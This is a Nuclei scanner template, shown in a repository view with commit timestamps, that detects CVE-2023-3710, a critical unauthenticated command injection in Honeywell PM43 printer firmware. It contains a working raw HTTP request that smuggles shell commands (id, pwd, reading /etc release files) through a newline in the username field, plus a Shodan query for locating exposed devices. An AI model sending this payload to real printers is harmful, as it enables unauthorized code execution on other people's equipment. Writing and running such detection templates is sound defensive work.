nuclei-templates/http/cves/2023/CVE-2023-3710.yaml

55 lines
2.0 KiB
YAML
Raw Normal View History

id: CVE-2023-3710
info:
name: Honeywell PM43 Printers - Command Injection
author: win3zz
2023-10-16 05:10:56 +00:00
severity: critical
description: |
2023-10-16 05:10:56 +00:00
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
reference:
2023-10-16 05:10:56 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-3710
- https://github.com/vpxuser/CVE-2023-3710-POC
2023-10-16 05:10:56 +00:00
- https://twitter.com/win3zz/status/1713451282344853634
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004
- https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A
2023-10-16 05:10:56 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3710
cwe-id: CWE-77,CWE-20
epss-score: 0.75328
epss-percentile: 0.97883
2023-10-16 05:10:56 +00:00
cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
metadata:
2023-10-16 10:50:20 +00:00
verified: true
max-request: 1
vendor: honeywell
product: pm43_firmware
2023-10-16 10:50:20 +00:00
shodan-query: http.html:"/main/login.lua?pageid="
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,honeywell,pm43,printer,iot,rce
http:
2023-10-16 10:50:20 +00:00
- raw:
- |
POST /loadfile.lp?pageid=Configure HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
2023-10-16 05:10:56 +00:00
matchers-condition: and
matchers:
2023-10-16 05:10:56 +00:00
- type: regex
part: body
regex:
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'
- type: word
2023-10-16 05:10:56 +00:00
part: body
words:
2023-10-16 05:10:56 +00:00
- 'Release date'
- type: status
status:
- 200
# digest: 4a0a00473045022100e65673944288c4ea38c1044a22777033e8ab6412a422cd751c1d2f1ed8dbf9a302207988cbc88e6e5d2a866dc57363ee691a4b374a1422637e2c051edb10462c5421:922c64590222798bb761d5b6d8e72950